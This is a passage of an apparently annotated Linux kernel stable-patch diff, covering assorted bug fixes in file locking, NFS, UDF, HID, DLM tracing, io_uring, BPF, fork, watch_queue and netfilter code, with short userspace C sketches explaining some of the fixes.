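		fd = index_nospec(fd, 8);	/* speculative clamp */
		printf("fd_table[%zu] = %d\n", fd, fd_table[fd]);
	}
	return 0;
}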
+diff --git a/fs/locks.c b/fs/locks.c
+index 7dc129cc1a267..240b9309ed6d5 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1862,9 +1862,10 @@ int generic_setlease(struct file *filp, long arg, struct file_lock **flp,
+ 			void **priv)
+ {
+ 	struct inode *inode = locks_inode(filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(file_mnt_user_ns(filp), inode);
+ 	int error;
+ 
+-	if ((!uid_eq(current_fsuid(), inode->i_uid)) && !capable(CAP_LEASE))
++	if ((!vfsuid_eq_kuid(vfsuid, current_fsuid())) && !capable(CAP_LEASE))
+ 		return -EACCES;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EINVAL;
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 0d49c6bb22eb1..59f9a8cee012a 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1037,7 +1037,9 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
++	file_start_write(file);
+ 	host_err = vfs_iter_write(file, &iter, &pos, flags);
++	file_end_write(file);
+ 	if (host_err < 0) {
+ 		nfsd_reset_write_verifier(nn);
+ 		trace_nfsd_writeverf_reset(nn, rqstp, host_err);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index 259152a08852b..a4e875b61f895 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -443,7 +443,7 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 	 * Block beyond EOF and prealloc extents? Just discard preallocation
+ 	 * as it is not useful and complicates things.
+ 	 */
+-	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++	if (((loff_t)block) << inode->i_blkbits >= iinfo->i_lenExtents)
+ 		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 48563dc09e171..0a1ccc68e798a 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -827,6 +827,7 @@ struct hid_driver {
+  * @output_report: send output report to device
+  * @idle: send idle request to device
+  * @may_wakeup: return if device may act as a wakeup source during system-suspend
++ * @max_buffer_size: over-ride maximum data buffer size (default: HID_MAX_BUFFER_SIZE)
+  */
+ struct hid_ll_driver {
+ 	int (*start)(struct hid_device *hdev);
+@@ -852,6 +853,8 @@ struct hid_ll_driver {
+ 
+ 	int (*idle)(struct hid_device *hdev, int report, int idle, int reqtype);
+ 	bool (*may_wakeup)(struct hid_device *hdev);
++
++	unsigned int max_buffer_size;
+ };
+ 
+ extern struct hid_ll_driver i2c_hid_ll_driver;
+diff --git a/include/linux/mhi_ep.h b/include/linux/mhi_ep.h
+index 478aece170462..f198a8ac7ee72 100644
+--- a/include/linux/mhi_ep.h
++++ b/include/linux/mhi_ep.h
+@@ -70,8 +70,8 @@ struct mhi_ep_db_info {
+  * @cmd_ctx_cache_phys: Physical address of the host command context cache
+  * @chdb: Array of channel doorbell interrupt info
+  * @event_lock: Lock for protecting event rings
+- * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @state_lock: Lock for protecting state transitions
++ * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @st_transition_list: List of state transitions
+  * @ch_db_list: List of queued channel doorbells
+  * @wq: Dedicated workqueue for handling rings and state changes
+@@ -117,8 +117,8 @@ struct mhi_ep_cntrl {
+ 
+ 	struct mhi_ep_db_info chdb[4];
+ 	struct mutex event_lock;
++	struct mutex state_lock;
+ 	spinlock_t list_lock;
+-	spinlock_t state_lock;
+ 
+ 	struct list_head st_transition_list;
+ 	struct list_head ch_db_list;
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index bc8f484cdcf3b..45c3d62e616d8 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3094,6 +3094,8 @@
+ 
+ #define PCI_VENDOR_ID_3COM_2		0xa727
+ 
++#define PCI_VENDOR_ID_SOLIDRUN		0xd063
++
+ #define PCI_VENDOR_ID_DIGIUM		0xd161
+ #define PCI_DEVICE_ID_DIGIUM_HFC4S	0xb410
+ 
+diff --git a/include/net/netfilter/nf_tproxy.h b/include/net/netfilter/nf_tproxy.h
+index 82d0e41b76f22..faa108b1ba675 100644
+--- a/include/net/netfilter/nf_tproxy.h
++++ b/include/net/netfilter/nf_tproxy.h
+@@ -17,6 +17,13 @@ static inline bool nf_tproxy_sk_is_transparent(struct sock *sk)
+ 	return false;
+ }
+ 
++static inline void nf_tproxy_twsk_deschedule_put(struct inet_timewait_sock *tw)
++{
++	local_bh_disable();
++	inet_twsk_deschedule_put(tw);
++	local_bh_enable();
++}
++
+ /* assign a socket to the skb -- consumes sk */
+ static inline void nf_tproxy_assign_sock(struct sk_buff *skb, struct sock *sk)
+ {
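nf_tproxy_twsk_deschedule_put() exists because inet_twsk_deschedule_put() must run with bottom halves disabled, while tproxy callers may not hold that context. A userspace sketch of the wrapper-establishes-precondition pattern, with all kernel primitives replaced by counters.

#include <stdio.h>

static int bh_disabled;

static void local_bh_disable(void) { bh_disabled++; }
static void local_bh_enable(void)  { bh_disabled--; }

static void twsk_deschedule_put(void)
{
	if (!bh_disabled)
		puts("BUG: called with bottom halves enabled");
	else
		puts("timewait socket released safely");
}

static void tproxy_twsk_deschedule_put(void)
{
	local_bh_disable();
	twsk_deschedule_put();	/* the precondition now holds */
	local_bh_enable();
}

int main(void)
{
	tproxy_twsk_deschedule_put();
	return 0;
}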
+diff --git a/include/trace/events/dlm.h b/include/trace/events/dlm.h
+index da0eaae98fa34..4ec47828d55ed 100644
+--- a/include/trace/events/dlm.h
++++ b/include/trace/events/dlm.h
+@@ -46,6 +46,56 @@
+ 	{ DLM_SBF_VALNOTVALID,	"VALNOTVALID" },		\
+ 	{ DLM_SBF_ALTMODE,	"ALTMODE" })
+ 
++#define show_lkb_flags(flags) __print_flags(flags, "|",		\
++	{ DLM_IFL_MSTCPY,	"MSTCPY" },			\
++	{ DLM_IFL_RESEND,	"RESEND" },			\
++	{ DLM_IFL_DEAD,		"DEAD" },			\
++	{ DLM_IFL_OVERLAP_UNLOCK, "OVERLAP_UNLOCK" },		\
++	{ DLM_IFL_OVERLAP_CANCEL, "OVERLAP_CANCEL" },		\
++	{ DLM_IFL_ENDOFLIFE,	"ENDOFLIFE" },			\
++	{ DLM_IFL_DEADLOCK_CANCEL, "DEADLOCK_CANCEL" },		\
++	{ DLM_IFL_STUB_MS,	"STUB_MS" },			\
++	{ DLM_IFL_USER,		"USER" },			\
++	{ DLM_IFL_ORPHAN,	"ORPHAN" })
++
++#define show_header_cmd(cmd) __print_symbolic(cmd,		\
++	{ DLM_MSG,		"MSG"},				\
++	{ DLM_RCOM,		"RCOM"},			\
++	{ DLM_OPTS,		"OPTS"},			\
++	{ DLM_ACK,		"ACK"},				\
++	{ DLM_FIN,		"FIN"})
++
++#define show_message_version(version) __print_symbolic(version,	\
++	{ DLM_VERSION_3_1,	"3.1"},				\
++	{ DLM_VERSION_3_2,	"3.2"})
++
++#define show_message_type(type) __print_symbolic(type,		\
++	{ DLM_MSG_REQUEST,	"REQUEST"},			\
++	{ DLM_MSG_CONVERT,	"CONVERT"},			\
++	{ DLM_MSG_UNLOCK,	"UNLOCK"},			\
++	{ DLM_MSG_CANCEL,	"CANCEL"},			\
++	{ DLM_MSG_REQUEST_REPLY, "REQUEST_REPLY"},		\
++	{ DLM_MSG_CONVERT_REPLY, "CONVERT_REPLY"},		\
++	{ DLM_MSG_UNLOCK_REPLY,	"UNLOCK_REPLY"},		\
++	{ DLM_MSG_CANCEL_REPLY,	"CANCEL_REPLY"},		\
++	{ DLM_MSG_GRANT,	"GRANT"},			\
++	{ DLM_MSG_BAST,		"BAST"},			\
++	{ DLM_MSG_LOOKUP,	"LOOKUP"},			\
++	{ DLM_MSG_REMOVE,	"REMOVE"},			\
++	{ DLM_MSG_LOOKUP_REPLY,	"LOOKUP_REPLY"},		\
++	{ DLM_MSG_PURGE,	"PURGE"})
++
++#define show_rcom_type(type) __print_symbolic(type,            \
++	{ DLM_RCOM_STATUS,              "STATUS"},              \
++	{ DLM_RCOM_NAMES,               "NAMES"},               \
++	{ DLM_RCOM_LOOKUP,              "LOOKUP"},              \
++	{ DLM_RCOM_LOCK,                "LOCK"},                \
++	{ DLM_RCOM_STATUS_REPLY,        "STATUS_REPLY"},        \
++	{ DLM_RCOM_NAMES_REPLY,         "NAMES_REPLY"},         \
++	{ DLM_RCOM_LOOKUP_REPLY,        "LOOKUP_REPLY"},        \
++	{ DLM_RCOM_LOCK_REPLY,          "LOCK_REPLY"})
++
++
+ /* note: we begin tracing dlm_lock_start() only if ls and lkb are found */
+ TRACE_EVENT(dlm_lock_start,
+ 
+@@ -290,6 +340,253 @@ TRACE_EVENT(dlm_unlock_end,
+ 
+ );
+ 
++DECLARE_EVENT_CLASS(dlm_rcom_template,
++
++	TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++
++	TP_ARGS(seq, rc),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, rc_type)
++		__field(int32_t, rc_result)
++		__field(uint64_t, rc_id)
++		__field(uint64_t, rc_seq)
++		__field(uint64_t, rc_seq_reply)
++		__dynamic_array(unsigned char, rc_buf,
++				le16_to_cpu(rc->rc_header.h_length) - sizeof(*rc))
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(rc->rc_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(rc->rc_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(rc->rc_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(rc->rc_header.h_length);
++		__entry->h_cmd = rc->rc_header.h_cmd;
++		__entry->rc_type = le32_to_cpu(rc->rc_type);
++		__entry->rc_result = le32_to_cpu(rc->rc_result);
++		__entry->rc_id = le64_to_cpu(rc->rc_id);
++		__entry->rc_seq = le64_to_cpu(rc->rc_seq);
++		__entry->rc_seq_reply = le64_to_cpu(rc->rc_seq_reply);
++		memcpy(__get_dynamic_array(rc_buf), rc->rc_buf,
++		       __get_dynamic_array_len(rc_buf));
++	),
++
++	TP_printk("seq=%u, h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s rc_type=%s rc_result=%d "
++		  "rc_id=%llu rc_seq=%llu rc_seq_reply=%llu "
++		  "rc_buf=0x%s", __entry->seq,
++		  show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_rcom_type(__entry->rc_type),
++		  __entry->rc_result, __entry->rc_id, __entry->rc_seq,
++		  __entry->rc_seq_reply,
++		  __print_hex_str(__get_dynamic_array(rc_buf),
++				  __get_dynamic_array_len(rc_buf)))
++
++);
++
++DEFINE_EVENT(dlm_rcom_template, dlm_send_rcom,
++	     TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++	     TP_ARGS(seq, rc));
++
++DEFINE_EVENT(dlm_rcom_template, dlm_recv_rcom,
++	     TP_PROTO(uint32_t seq, const struct dlm_rcom *rc),
++	     TP_ARGS(seq, rc));
++
++TRACE_EVENT(dlm_send_message,
++
++	TP_PROTO(uint32_t seq, const struct dlm_message *ms,
++		 const void *name, int namelen),
++
++	TP_ARGS(seq, ms, name, namelen),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, m_type)
++		__field(uint32_t, m_nodeid)
++		__field(uint32_t, m_pid)
++		__field(uint32_t, m_lkid)
++		__field(uint32_t, m_remid)
++		__field(uint32_t, m_parent_lkid)
++		__field(uint32_t, m_parent_remid)
++		__field(uint32_t, m_exflags)
++		__field(uint32_t, m_sbflags)
++		__field(uint32_t, m_flags)
++		__field(uint32_t, m_lvbseq)
++		__field(uint32_t, m_hash)
++		__field(int32_t, m_status)
++		__field(int32_t, m_grmode)
++		__field(int32_t, m_rqmode)
++		__field(int32_t, m_bastmode)
++		__field(int32_t, m_asts)
++		__field(int32_t, m_result)
++		__dynamic_array(unsigned char, m_extra,
++				le16_to_cpu(ms->m_header.h_length) - sizeof(*ms))
++		__dynamic_array(unsigned char, res_name, namelen)
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(ms->m_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(ms->m_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(ms->m_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(ms->m_header.h_length);
++		__entry->h_cmd = ms->m_header.h_cmd;
++		__entry->m_type = le32_to_cpu(ms->m_type);
++		__entry->m_nodeid = le32_to_cpu(ms->m_nodeid);
++		__entry->m_pid = le32_to_cpu(ms->m_pid);
++		__entry->m_lkid = le32_to_cpu(ms->m_lkid);
++		__entry->m_remid = le32_to_cpu(ms->m_remid);
++		__entry->m_parent_lkid = le32_to_cpu(ms->m_parent_lkid);
++		__entry->m_parent_remid = le32_to_cpu(ms->m_parent_remid);
++		__entry->m_exflags = le32_to_cpu(ms->m_exflags);
++		__entry->m_sbflags = le32_to_cpu(ms->m_sbflags);
++		__entry->m_flags = le32_to_cpu(ms->m_flags);
++		__entry->m_lvbseq = le32_to_cpu(ms->m_lvbseq);
++		__entry->m_hash = le32_to_cpu(ms->m_hash);
++		__entry->m_status = le32_to_cpu(ms->m_status);
++		__entry->m_grmode = le32_to_cpu(ms->m_grmode);
++		__entry->m_rqmode = le32_to_cpu(ms->m_rqmode);
++		__entry->m_bastmode = le32_to_cpu(ms->m_bastmode);
++		__entry->m_asts = le32_to_cpu(ms->m_asts);
++		__entry->m_result = le32_to_cpu(ms->m_result);
++		memcpy(__get_dynamic_array(m_extra), ms->m_extra,
++		       __get_dynamic_array_len(m_extra));
++		memcpy(__get_dynamic_array(res_name), name,
++		       __get_dynamic_array_len(res_name));
++	),
++
++	TP_printk("seq=%u h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s m_type=%s m_nodeid=%u "
++		  "m_pid=%u m_lkid=%u m_remid=%u m_parent_lkid=%u "
++		  "m_parent_remid=%u m_exflags=%s m_sbflags=%s m_flags=%s "
++		  "m_lvbseq=%u m_hash=%u m_status=%d m_grmode=%s "
++		  "m_rqmode=%s m_bastmode=%s m_asts=%d m_result=%d "
++		  "m_extra=0x%s res_name=0x%s",
++		  __entry->seq, show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_message_type(__entry->m_type),
++		  __entry->m_nodeid, __entry->m_pid, __entry->m_lkid,
++		  __entry->m_remid, __entry->m_parent_lkid,
++		  __entry->m_parent_remid, show_lock_flags(__entry->m_exflags),
++		  show_dlm_sb_flags(__entry->m_sbflags),
++		  show_lkb_flags(__entry->m_flags), __entry->m_lvbseq,
++		  __entry->m_hash, __entry->m_status,
++		  show_lock_mode(__entry->m_grmode),
++		  show_lock_mode(__entry->m_rqmode),
++		  show_lock_mode(__entry->m_bastmode),
++		  __entry->m_asts, __entry->m_result,
++		  __print_hex_str(__get_dynamic_array(m_extra),
++				  __get_dynamic_array_len(m_extra)),
++		  __print_hex_str(__get_dynamic_array(res_name),
++				  __get_dynamic_array_len(res_name)))
++
++);
++
++TRACE_EVENT(dlm_recv_message,
++
++	TP_PROTO(uint32_t seq, const struct dlm_message *ms),
++
++	TP_ARGS(seq, ms),
++
++	TP_STRUCT__entry(
++		__field(uint32_t, seq)
++		__field(uint32_t, h_version)
++		__field(uint32_t, h_lockspace)
++		__field(uint32_t, h_nodeid)
++		__field(uint16_t, h_length)
++		__field(uint8_t, h_cmd)
++		__field(uint32_t, m_type)
++		__field(uint32_t, m_nodeid)
++		__field(uint32_t, m_pid)
++		__field(uint32_t, m_lkid)
++		__field(uint32_t, m_remid)
++		__field(uint32_t, m_parent_lkid)
++		__field(uint32_t, m_parent_remid)
++		__field(uint32_t, m_exflags)
++		__field(uint32_t, m_sbflags)
++		__field(uint32_t, m_flags)
++		__field(uint32_t, m_lvbseq)
++		__field(uint32_t, m_hash)
++		__field(int32_t, m_status)
++		__field(int32_t, m_grmode)
++		__field(int32_t, m_rqmode)
++		__field(int32_t, m_bastmode)
++		__field(int32_t, m_asts)
++		__field(int32_t, m_result)
++		__dynamic_array(unsigned char, m_extra,
++				le16_to_cpu(ms->m_header.h_length) - sizeof(*ms))
++	),
++
++	TP_fast_assign(
++		__entry->seq = seq;
++		__entry->h_version = le32_to_cpu(ms->m_header.h_version);
++		__entry->h_lockspace = le32_to_cpu(ms->m_header.u.h_lockspace);
++		__entry->h_nodeid = le32_to_cpu(ms->m_header.h_nodeid);
++		__entry->h_length = le16_to_cpu(ms->m_header.h_length);
++		__entry->h_cmd = ms->m_header.h_cmd;
++		__entry->m_type = le32_to_cpu(ms->m_type);
++		__entry->m_nodeid = le32_to_cpu(ms->m_nodeid);
++		__entry->m_pid = le32_to_cpu(ms->m_pid);
++		__entry->m_lkid = le32_to_cpu(ms->m_lkid);
++		__entry->m_remid = le32_to_cpu(ms->m_remid);
++		__entry->m_parent_lkid = le32_to_cpu(ms->m_parent_lkid);
++		__entry->m_parent_remid = le32_to_cpu(ms->m_parent_remid);
++		__entry->m_exflags = le32_to_cpu(ms->m_exflags);
++		__entry->m_sbflags = le32_to_cpu(ms->m_sbflags);
++		__entry->m_flags = le32_to_cpu(ms->m_flags);
++		__entry->m_lvbseq = le32_to_cpu(ms->m_lvbseq);
++		__entry->m_hash = le32_to_cpu(ms->m_hash);
++		__entry->m_status = le32_to_cpu(ms->m_status);
++		__entry->m_grmode = le32_to_cpu(ms->m_grmode);
++		__entry->m_rqmode = le32_to_cpu(ms->m_rqmode);
++		__entry->m_bastmode = le32_to_cpu(ms->m_bastmode);
++		__entry->m_asts = le32_to_cpu(ms->m_asts);
++		__entry->m_result = le32_to_cpu(ms->m_result);
++		memcpy(__get_dynamic_array(m_extra), ms->m_extra,
++		       __get_dynamic_array_len(m_extra));
++	),
++
++	TP_printk("seq=%u h_version=%s h_lockspace=%u h_nodeid=%u "
++		  "h_length=%u h_cmd=%s m_type=%s m_nodeid=%u "
++		  "m_pid=%u m_lkid=%u m_remid=%u m_parent_lkid=%u "
++		  "m_parent_remid=%u m_exflags=%s m_sbflags=%s m_flags=%s "
++		  "m_lvbseq=%u m_hash=%u m_status=%d m_grmode=%s "
++		  "m_rqmode=%s m_bastmode=%s m_asts=%d m_result=%d "
++		  "m_extra=0x%s",
++		  __entry->seq, show_message_version(__entry->h_version),
++		  __entry->h_lockspace, __entry->h_nodeid, __entry->h_length,
++		  show_header_cmd(__entry->h_cmd),
++		  show_message_type(__entry->m_type),
++		  __entry->m_nodeid, __entry->m_pid, __entry->m_lkid,
++		  __entry->m_remid, __entry->m_parent_lkid,
++		  __entry->m_parent_remid, show_lock_flags(__entry->m_exflags),
++		  show_dlm_sb_flags(__entry->m_sbflags),
++		  show_lkb_flags(__entry->m_flags), __entry->m_lvbseq,
++		  __entry->m_hash, __entry->m_status,
++		  show_lock_mode(__entry->m_grmode),
++		  show_lock_mode(__entry->m_rqmode),
++		  show_lock_mode(__entry->m_bastmode),
++		  __entry->m_asts, __entry->m_result,
++		  __print_hex_str(__get_dynamic_array(m_extra),
++				  __get_dynamic_array_len(m_extra)))
++
++);
++
+ TRACE_EVENT(dlm_send,
+ 
+ 	TP_PROTO(int nodeid, int ret),
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index e50de0b6b9f84..18dfc5f6a8b72 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -108,7 +108,7 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *file = req->file;
+ 	int ret;
+ 
+-	if (!req->file->f_op->uring_cmd)
++	if (!file->f_op->uring_cmd)
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = security_uring_cmd(ioucmd);
+@@ -120,6 +120,8 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (ctx->flags & IORING_SETUP_CQE32)
+ 		issue_flags |= IO_URING_F_CQE32;
+ 	if (ctx->flags & IORING_SETUP_IOPOLL) {
++		if (!file->f_op->uring_cmd_iopoll)
++			return -EOPNOTSUPP;
+ 		issue_flags |= IO_URING_F_IOPOLL;
+ 		req->iopoll_completed = 0;
+ 		WRITE_ONCE(ioucmd->cookie, NULL);
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 7fcbe5d002070..b73169737a01e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4163,6 +4163,7 @@ static int btf_datasec_resolve(struct btf_verifier_env *env,
+ 	struct btf *btf = env->btf;
+ 	u16 i;
+ 
++	env->resolve_mode = RESOLVE_TBD;
+ 	for_each_vsi_from(i, v->next_member, v->t, vsi) {
+ 		u32 var_type_id = vsi->type, type_id, type_size = 0;
+ 		const struct btf_type *var_type = btf_type_by_id(env->btf,
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 844dfdc8c639c..a6d243a50be3e 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2928,7 +2928,7 @@ static bool clone3_args_valid(struct kernel_clone_args *kargs)
+ 	 * - make the CLONE_DETACHED bit reusable for clone3
+ 	 * - make the CSIGNAL bits reusable for clone3
+ 	 */
+-	if (kargs->flags & (CLONE_DETACHED | CSIGNAL))
++	if (kargs->flags & (CLONE_DETACHED | (CSIGNAL & (~CLONE_NEWTIME))))
+ 		return false;
+ 
+ 	if ((kargs->flags & (CLONE_SIGHAND | CLONE_CLEAR_SIGHAND)) ==
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index a6f9bdd956c39..f10f403104e7d 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -273,6 +273,7 @@ long watch_queue_set_size(struct pipe_inode_info *pipe, unsigned int nr_notes)
+ 	if (ret < 0)
+ 		goto error;
+ 
++	ret = -ENOMEM;
+ 	pages = kcalloc(sizeof(struct page *), nr_pages, GFP_KERNEL);
+ 	if (!pages)
+ 		goto error;
+diff --git a/net/caif/caif_usb.c b/net/caif/caif_usb.c
+index ebc202ffdd8d8..bf61ea4b8132d 100644
+--- a/net/caif/caif_usb.c
++++ b/net/caif/caif_usb.c
+@@ -134,6 +134,9 @@ static int cfusbl_device_notify(struct notifier_block *me, unsigned long what,
+ 	struct usb_device *usbdev;
+ 	int res;
+ 
++	if (what == NETDEV_UNREGISTER && dev->reg_state >= NETREG_UNREGISTERED)
++		return 0;
++
+ 	/* Check whether we have a NCM device, and find its VID/PID. */
+ 	if (!(dev->dev.parent && dev->dev.parent->driver &&
+ 	      strcmp(dev->dev.parent->driver->name, "cdc_ncm") == 0))
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 4dfdcdfd00114..eb0b76acd9df1 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2805,7 +2805,8 @@ static void sk_enter_memory_pressure(struct sock *sk)
+ static void sk_leave_memory_pressure(struct sock *sk)
+ {
+ 	if (sk->sk_prot->leave_memory_pressure) {
+-		sk->sk_prot->leave_memory_pressure(sk);
++		INDIRECT_CALL_INET_1(sk->sk_prot->leave_memory_pressure,
++				     tcp_leave_memory_pressure, sk);
+ 	} else {
+ 		unsigned long *memory_pressure = sk->sk_prot->memory_pressure;
+ 
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index b22b2c745c76c..69e3317996043 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -38,7 +38,7 @@ nf_tproxy_handle_time_wait4(struct net *net, struct sk_buff *skb,
+ 					    hp->source, lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf26d65ca3893..ebf9175119370 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -186,6 +186,9 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+@@ -244,6 +247,9 @@ static int tcp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv4/udp_bpf.c b/net/ipv4/udp_bpf.c
+index e5dc91d0e0793..0735d820e413f 100644
+--- a/net/ipv4/udp_bpf.c
++++ b/net/ipv4/udp_bpf.c
+@@ -68,6 +68,9 @@ static int udp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return sk_udp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index 47447f0241df6..bee45dfeb1874 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -477,6 +477,7 @@ int ila_xlat_nl_cmd_get_mapping(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	rcu_read_lock();
+ 
++	ret = -ESRCH;
+ 	ila = ila_lookup_by_params(&xp, ilan);
+ 	if (ila) {
+ 		ret = ila_dump_info(ila,
+diff --git a/net/ipv6/netfilter/nf_tproxy_ipv6.c b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+index 929502e51203b..52f828bb5a83d 100644
+--- a/net/ipv6/netfilter/nf_tproxy_ipv6.c
++++ b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+@@ -63,7 +63,7 @@ nf_tproxy_handle_time_wait6(struct sk_buff *skb, int tproto, int thoff,
+ 					    lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 7f0f3bcaae031..30ed45b1b57df 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -96,8 +96,8 @@ static DEFINE_MUTEX(nf_conntrack_mutex);
+ #define GC_SCAN_MAX_DURATION	msecs_to_jiffies(10)
+ #define GC_SCAN_EXPIRED_MAX	(64000u / HZ)
+ 
+-#define MIN_CHAINLEN	8u
+-#define MAX_CHAINLEN	(32u - MIN_CHAINLEN)
++#define MIN_CHAINLEN	50u
++#define MAX_CHAINLEN	(80u - MIN_CHAINLEN)
+ 
+ static struct conntrack_gc_work conntrack_gc_work;
+ 
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 733bb56950c14..d095d3c1ceca6 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,11 +328,12 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct,
++			       bool dump)
+ {
+ 	u32 mark = READ_ONCE(ct->mark);
+ 
+-	if (!mark)
++	if (!mark && !dump)
+ 		return 0;
+ 
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+@@ -343,7 +344,7 @@ nla_put_failure:
+ 	return -1;
+ }
+ #else
+-#define ctnetlink_dump_mark(a, b) (0)
++#define ctnetlink_dump_mark(a, b, c) (0)
+ #endif
+ 
+ #ifdef CONFIG_NF_CONNTRACK_SECMARK
+@@ -548,7 +549,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
